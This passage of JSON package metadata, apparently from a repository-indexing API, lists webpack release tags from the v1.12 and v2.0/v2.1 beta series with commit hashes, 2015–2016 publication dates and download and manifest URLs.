repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name"